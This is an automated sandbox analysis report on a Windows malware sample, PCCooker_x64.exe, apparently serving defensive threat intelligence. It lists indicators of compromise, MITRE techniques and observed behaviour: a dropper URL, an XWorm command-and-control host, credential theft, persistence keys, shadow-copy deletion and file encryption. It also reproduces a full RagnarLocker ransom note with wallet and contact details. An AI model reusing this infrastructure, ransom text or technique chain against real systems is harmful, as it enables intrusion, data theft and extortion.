marsstealer | d850d741582546a3d0ea2ad5d25e0766781f315cd37e6c58f7262df571cd0c40

Resubmissions

20-09-2024 07:47

240920-jmh8dswane 10

20-09-2024 07:46

240920-jl2ckswdpk 10

20-09-2024 03:56

240920-ehjadaxcqb 10

20-09-2024 03:35

240920-d5fx4awerf 10

Analysis

max time kernel
39s
max time network
61s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
20-09-2024 03:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PCCooker_x64.exe
Size

22.4MB
MD5

317c5fe16b5314d1921930e300d9ea39
SHA1

65eb02c735bbbf1faf212662539fbf88a00a271f
SHA256

d850d741582546a3d0ea2ad5d25e0766781f315cd37e6c58f7262df571cd0c40
SHA512

31751379ad7f6c55d87e9a5c1f56e6211d515b7d9ae055af962ed6f9205f5abad302c2e47dd56325abff85327ec3b7f9a6cf76ed34b8cbe1da06549c622c7031
SSDEEP

49152:yIT4lj7Rl9HFoDi+3JK5CS2bV5IRtyrp63FDysl28Wvp/pUOmrscrdXuMIgqJ95+:yI6

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://37.1.196.35/un2/botui.dat

Extracted

Family

marsstealer

Botnet

Default

Extracted

Path

C:\Users\Public\Documents\RGNR_2055E903.txt

Ransom Note

Hello VGCARGO ! ***************************************************************************************************************** If you reading this message, then your network was PENETRATED and all of your files and data has been ENCRYPTED by RAGNAR_LOCKER ! ***************************************************************************************************************** *********What happens with your system ?************ Your network was penetrated, all your files and backups was locked! So from now there is NO ONE CAN HELP YOU to get your files back, EXCEPT US. You can google it, there is no CHANCES to decrypt data without our SECRET KEY. But don't worry ! Your files are NOT DAMAGED or LOST, they are just MODIFIED. You can get it BACK as soon as you PAY. We are looking only for MONEY, so there is no interest for us to steel or delete your information, it's just a BUSINESS $-) HOWEVER you can damage your DATA by yourself if you try to DECRYPT by any other software, without OUR SPECIFIC ENCRYPTION KEY !!! Also, all of your sensitive and private information were gathered and if you decide NOT to pay, we will upload it for public view ! **** ***********How to get back your files ?****** To decrypt all your files and data you have to pay for the encryption KEY : BTC wallet for payment: 1BKK8bsFfG3YxTd3N15GxaYfHopoThXoY4 Amount to pay (in Bitcoin): 25 **** ***********How much time you have to pay?********** * You should get in contact with us within 2 days after you noticed the encryption to get a better price. * The price would be increased by 100% (double price) after 14 Days if there is no contact made. * The key would be completely erased in 21 day if there is no contact made or no deal made. Some sensetive information stolen from the file servers would be uploaded in public or to re-seller. **** ***********What if files can't be restored ?****** To prove that we really can decrypt your data, we will decrypt one of your locked files ! Just send it to us and you will get it back FOR FREE. The price for the decryptor is based on the network size, number of employees, annual revenue. Please feel free to contact us for amount of BTC that should be paid. **** ! IF you don't know how to get bitcoins, we will give you advise how to exchange the money. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ! HERE IS THE SIMPLE MANUAL HOW TO GET CONTCAT WITH US ! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1) Go to the official website of TOX messenger ( https://tox.chat/download.html ) 2) Download and install qTOX on your PC, choose the platform ( Windows, OS X, Linux, etc. ) 3) Open messenger, click "New Profile" and create profile. 4) Click "Add friends" button and search our contact 7D509C5BB14B1B8CB0A3338EEA9707AD31075868CB9515B17C4C0EC6A0CCCA750CA81606900D 5) For identification, send to our support data from ---RAGNAR SECRET--- IMPORTANT ! IF for some reasons you CAN'T CONTACT us in qTOX, here is our reserve mailbox ( [email protected] ) send a message with a data from ---RAGNAR SECRET--- WARNING! -Do not try to decrypt files with any third-party software (it will be damaged permanently) -Do not reinstall your OS, this can lead to complete data loss and files cannot be decrypted. NEVER! -Your SECRET KEY for decryption is on our server, but it will not be stored forever. DO NOT WASTE TIME ! *********************************************************************************** ---RAGNAR SECRET--- QWZjY0QxRTk2MWU4RTIwYkVCRUNhRWMzRjhCQTdlZDJkNUJCN2JkNDdDMzREMTYyNjNGNTdiZGFDYmI3ZEVhNw== ---RAGNAR SECRET--- ***********************************************************************************

Emails

[email protected]

Wallets

1BKK8bsFfG3YxTd3N15GxaYfHopoThXoY4

URLs

https://tox.chat/download.html

Extracted

Family

xworm

Version

5.0

outside-sand.gl.at.ply.gg:31300

Mutex

uGoUQjcjqoZsiRJZ

Attributes

Install_directory
%AppData%
install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 50 IoCs

resource	yara_rule
behavioral1/files/0x000400000001cba2-739.dat	family_xworm
behavioral1/files/0x000400000001cbba-768.dat	family_xworm
behavioral1/files/0x000400000001cbc4-787.dat	family_xworm
behavioral1/files/0x000400000001cbbf-773.dat	family_xworm
behavioral1/files/0x000400000001cbac-748.dat	family_xworm
behavioral1/memory/3048-810-0x00000000012D0000-0x00000000012E0000-memory.dmp	family_xworm
behavioral1/memory/2060-801-0x0000000001030000-0x0000000001040000-memory.dmp	family_xworm
behavioral1/memory/924-798-0x0000000000DE0000-0x0000000000DF0000-memory.dmp	family_xworm
behavioral1/memory/2492-795-0x0000000001110000-0x0000000001120000-memory.dmp	family_xworm
behavioral1/memory/2384-823-0x00000000012E0000-0x00000000012F0000-memory.dmp	family_xworm
behavioral1/files/0x000400000001cbcc-843.dat	family_xworm
behavioral1/files/0x000400000001cbf0-848.dat	family_xworm
behavioral1/files/0x000400000001cc03-869.dat	family_xworm
behavioral1/files/0x000400000001cbf8-868.dat	family_xworm
behavioral1/files/0x000400000001cbfc-870.dat	family_xworm
behavioral1/memory/2496-881-0x0000000000F60000-0x0000000000F70000-memory.dmp	family_xworm
behavioral1/files/0x000400000001cc24-896.dat	family_xworm
behavioral1/memory/800-929-0x0000000000A80000-0x0000000000A90000-memory.dmp	family_xworm
behavioral1/memory/2984-928-0x0000000000AE0000-0x0000000000AF0000-memory.dmp	family_xworm
behavioral1/files/0x000400000001cc68-921.dat	family_xworm
behavioral1/memory/2892-916-0x00000000013D0000-0x00000000013E0000-memory.dmp	family_xworm
behavioral1/files/0x000400000001cc38-897.dat	family_xworm
behavioral1/memory/3004-946-0x00000000013B0000-0x00000000013C0000-memory.dmp	family_xworm
behavioral1/files/0x000400000001cc95-943.dat	family_xworm
behavioral1/memory/2708-941-0x0000000000BD0000-0x0000000000BE0000-memory.dmp	family_xworm
behavioral1/memory/224-939-0x0000000000D30000-0x0000000000D40000-memory.dmp	family_xworm
behavioral1/memory/2176-886-0x0000000000E70000-0x0000000000E80000-memory.dmp	family_xworm
behavioral1/files/0x000400000001cc93-950.dat	family_xworm
behavioral1/files/0x000400000001cc9b-949.dat	family_xworm
behavioral1/memory/1572-971-0x0000000001260000-0x0000000001270000-memory.dmp	family_xworm
behavioral1/files/0x000400000001cc9d-984.dat	family_xworm
behavioral1/files/0x000400000001cca1-1014.dat	family_xworm
behavioral1/memory/2336-1032-0x00000000008F0000-0x0000000000900000-memory.dmp	family_xworm
behavioral1/files/0x000400000001ccaa-1031.dat	family_xworm
behavioral1/memory/2520-1028-0x0000000000930000-0x0000000000940000-memory.dmp	family_xworm
behavioral1/files/0x000400000001cca6-1024.dat	family_xworm
behavioral1/files/0x000400000001cca4-1022.dat	family_xworm
behavioral1/memory/1744-1007-0x0000000000360000-0x0000000000370000-memory.dmp	family_xworm
behavioral1/memory/2736-1069-0x0000000000AD0000-0x0000000000AE0000-memory.dmp	family_xworm
behavioral1/memory/3060-1064-0x0000000000BE0000-0x0000000000BF0000-memory.dmp	family_xworm
behavioral1/files/0x000400000001ccab-1091.dat	family_xworm
behavioral1/memory/1624-1085-0x0000000000970000-0x0000000000980000-memory.dmp	family_xworm
behavioral1/memory/1052-1063-0x0000000000070000-0x0000000000080000-memory.dmp	family_xworm
behavioral1/files/0x000400000001cd60-1106.dat	family_xworm
behavioral1/memory/228-1104-0x0000000000BB0000-0x0000000000BC0000-memory.dmp	family_xworm
behavioral1/memory/1380-1109-0x0000000000CE0000-0x0000000000CF0000-memory.dmp	family_xworm
behavioral1/files/0x000400000001cd8b-1134.dat	family_xworm
behavioral1/files/0x000400000001cdad-1140.dat	family_xworm
behavioral1/memory/1824-1142-0x00000000008F0000-0x0000000000900000-memory.dmp	family_xworm
behavioral1/memory/2608-1154-0x00000000012E0000-0x00000000012F0000-memory.dmp	family_xworm

Mars Stealer
An infostealer written in C++ based on other infostealers.
stealer marsstealer

Phorphiex payload 1 IoCs

resource	yara_rule
behavioral1/files/0x000200000000ec89-20295.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
RagnarLocker
Ransomware first seen at the end of 2019, which has been used in targetted attacks against multiple companies.
ransomware ragnarlocker
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/memory/5352-9322-0x0000000000600000-0x0000000000644000-memory.dmp	family_redline
behavioral1/memory/5352-9295-0x0000000001D90000-0x0000000001DD6000-memory.dmp	family_redline

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (7827) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Blocklisted process makes network request 9 IoCs

flow	pid	Process
54	5348	MSBuild.exe
57	5348	MSBuild.exe
59	5348	MSBuild.exe
60	3220	powershell.exe
61	5348	MSBuild.exe
67	5348	MSBuild.exe
75	5348	MSBuild.exe
76	5348	MSBuild.exe
77	5348	MSBuild.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5292	powershell.exe
4876	powershell.exe
4328	powershell.exe
4768	powershell.exe
3964	powershell.exe
4000	powershell.exe
3316	powershell.exe
5452	powershell.exe
5548	powershell.exe
6636	powershell.exe
7136	powershell.exe
5604	powershell.exe
6044	powershell.exe
4448	powershell.exe
5348	powershell.exe
4764	powershell.exe
4256	powershell.exe
5752	powershell.exe
6596	powershell.exe
7076	powershell.exe
4624	powershell.exe
1740	powershell.exe
4820	powershell.exe
4656	powershell.exe
4276	powershell.exe
4284	powershell.exe
4616	powershell.exe
4848	powershell.exe
4712	powershell.exe
3140	powershell.exe
4564	powershell.exe
4712	powershell.exe
4400	powershell.exe
6380	powershell.exe
3300	powershell.exe
5916	powershell.exe
4636	powershell.exe
4424	powershell.exe
4388	powershell.exe
5296	powershell.exe
5428	powershell.exe
2312	powershell.exe
3264	powershell.exe
7060	powershell.exe
3936	powershell.exe
6008	powershell.exe
7152	powershell.exe
3088	powershell.exe
7156	powershell.exe
5768	powershell.exe
4412	powershell.exe
6508	powershell.exe
4676	powershell.exe
4128	powershell.exe
1308	powershell.exe
4892	powershell.exe
4292	powershell.exe
5332	powershell.exe
5080	powershell.exe
5960	powershell.exe
5756	powershell.exe
6612	powershell.exe
5896	powershell.exe
4588	powershell.exe

Downloads MZ/PE file
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 19 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.lnk	15.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.lnk	22.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.lnk	20.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.lnk	2.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.lnk	14.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.lnk	12.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.lnk	13.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.lnk	9.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\90bde8fe.exe	explorer.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.lnk	16.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.lnk	24.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.lnk	25.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.lnk	4.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\RGNR_2055E903.txt	asena.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.lnk	10.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.lnk	10.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.lnk	7.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.lnk	18.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.lnk	8.exe

Executes dropped EXE 41 IoCs

pid	Process
2428	4363463463464363463463463.exe
1976	a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exe
2296	asena.exe
2912	Bomb.exe
2340	CryptoWall.exe
2492	25.exe
2060	24.exe
924	23.exe
3048	22.exe
2384	21.exe
2984	20.exe
2496	19.exe
2176	17.exe
800	18.exe
2892	16.exe
2708	14.exe
224	15.exe
3004	13.exe
1572	11.exe
2520	10.exe
2336	12.exe
1744	9.exe
1624	8.exe
1052	7.exe
3060	6.exe
2736	5.exe
228	4.exe
1380	3.exe
2608	2.exe
1824	1.exe
1940	66b5d9d3adbaa_defaultr.exe
5460	pyl64.exe
5352	66e805302f63c_otr.exe
6212	66c6def3f0546_sss.exe
6364	66c6def3f0546_sss.exe
4564	66c6def3f0546_sss.exe
4464	66c6def3f0546_sss.exe
6912	66c6def3f0546_sss.exe
6036	66c6def3f0546_sss.exe
6096	ngrok86.exe
5960	tt.exe

Loads dropped DLL 21 IoCs

pid	Process
804	PCCooker_x64.exe
804	PCCooker_x64.exe
804	PCCooker_x64.exe
804	PCCooker_x64.exe
804	PCCooker_x64.exe
804	PCCooker_x64.exe
804	PCCooker_x64.exe
2428	4363463463464363463463463.exe
2428	4363463463464363463463463.exe
2428	4363463463464363463463463.exe
2428	4363463463464363463463463.exe
2428	4363463463464363463463463.exe
6212	66c6def3f0546_sss.exe
6212	66c6def3f0546_sss.exe
6212	66c6def3f0546_sss.exe
6212	66c6def3f0546_sss.exe
6212	66c6def3f0546_sss.exe
2428	4363463463464363463463463.exe
2428	4363463463464363463463463.exe
2428	4363463463464363463463463.exe
2428	4363463463464363463463463.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*0bde8fe = "C:\\Users\\Admin\\AppData\\Roaming\\90bde8fe.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\90bde8f = "C:\\90bde8fe\\90bde8fe.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*0bde8f = "C:\\90bde8fe\\90bde8fe.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\90bde8fe = "C:\\Users\\Admin\\AppData\\Roaming\\90bde8fe.exe"	explorer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	asena.exe

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com
19	ip-api.com
20	ip-api.com
21	ip-api.com
5	ip-addr.es
7	myexternalip.com
17	ip-api.com

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	asena.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1940 set thread context of 5348	1940	66b5d9d3adbaa_defaultr.exe	224

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\es-ES\msdaorar.dll.mui	asena.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)grayStateIcon.png	asena.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_ButtonGraphic.png	asena.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\vlc.mo	asena.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\PREVIEW.GIF	asena.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_05.MID	asena.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\POSTCARD.XML	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Barbados	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montreal	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml	asena.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Maroon.css	asena.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Jamaica	asena.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\RGNR_2055E903.txt	asena.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter_partly-cloudy.png	asena.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR27F.GIF	asena.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\TAB_ON.GIF	asena.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ast.txt	asena.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lt.txt	asena.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105912.WMF	asena.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG	asena.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG_PAL.wmv	asena.exe
File opened for modification	C:\Program Files\Windows NT\TableTextService\TableTextServiceSimplifiedShuangPin.txt	asena.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151045.WMF	asena.exe
File created	C:\Program Files\Common Files\Microsoft Shared\OFFICE14\RGNR_2055E903.txt	asena.exe
File created	C:\Program Files\Common Files\System\Ole DB\es-ES\RGNR_2055E903.txt	asena.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\RGNR_2055E903.txt	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar	asena.exe
File created	C:\Program Files\Windows Journal\it-IT\RGNR_2055E903.txt	asena.exe
File opened for modification	C:\Program Files\7-Zip\Lang\id.txt	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\mip.exe.mui	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipssrb.xml	asena.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif	asena.exe
File created	C:\Program Files\Windows NT\Accessories\it-IT\RGNR_2055E903.txt	asena.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185800.WMF	asena.exe
File opened for modification	C:\Program Files\Java\jre7\lib\security\cacerts	asena.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Spades\ja-JP\RGNR_2055E903.txt	asena.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\mux\RGNR_2055E903.txt	asena.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml	asena.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099172.WMF	asena.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG	asena.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\OLADD.FAE	asena.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\system_h.png	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-explorer.jar	asena.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Spades\ja-JP\ShvlRes.dll.mui	asena.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo	asena.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\button-highlight.png	asena.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\de-DE\SpiderSolitaire.exe.mui	asena.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui	asena.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02450_.WMF	asena.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG	asena.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN103.XML	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chatham	asena.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer.png	asena.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG	asena.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo	asena.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\RGNR_2055E903.txt	asena.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00921_.WMF	asena.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\it-IT\css\RGNR_2055E903.txt	asena.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_up.png	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\FlickAnimation.avi	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar	asena.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Tehran	asena.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\RGNR_2055E903.txt	asena.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG	asena.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	66e805302f63c_otr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	66c6def3f0546_sss.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	notepad.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PCCooker_x64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CryptoWall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vssadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	asena.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	66b5d9d3adbaa_defaultr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ngrok86.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5796	timeout.exe

Interacts with shadow copies 3 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
2856	vssadmin.exe
2116	vssadmin.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
5636	notepad.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4200	powershell.exe
4368	powershell.exe
4560	powershell.exe
4636	powershell.exe
4820	powershell.exe
4676	powershell.exe
4764	powershell.exe
4256	powershell.exe
4624	powershell.exe
4424	powershell.exe
5080	powershell.exe
4656	powershell.exe
4484	powershell.exe
1308	powershell.exe
4128	powershell.exe
5108	powershell.exe
4524	powershell.exe
4588	powershell.exe
4276	powershell.exe
4628	powershell.exe
6008	powershell.exe
5548	powershell.exe
5604	powershell.exe
5476	powershell.exe
5768	powershell.exe
5428	powershell.exe
5916	powershell.exe
5908	powershell.exe
5960	powershell.exe
5368	powershell.exe
4328	powershell.exe
6040	powershell.exe
4388	powershell.exe
4284	powershell.exe
4180	powershell.exe
3964	powershell.exe
5228	powershell.exe
5896	powershell.exe
5752	powershell.exe
4892	powershell.exe
4740	powershell.exe
4712	powershell.exe
2312	powershell.exe
5292	powershell.exe
5124	powershell.exe
4768	powershell.exe
5724	powershell.exe
4672	powershell.exe
3316	powershell.exe
4564	powershell.exe
4300	powershell.exe
4380	powershell.exe
4380	powershell.exe
4400	powershell.exe
4400	powershell.exe
7112	powershell.exe
7152	powershell.exe
4876	powershell.exe
4412	powershell.exe
5756	powershell.exe
2136	powershell.exe
6044	powershell.exe
5980	powershell.exe
4448	powershell.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2340	CryptoWall.exe
2768	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2944	wmic.exe
Token: SeSecurityPrivilege	2944	wmic.exe
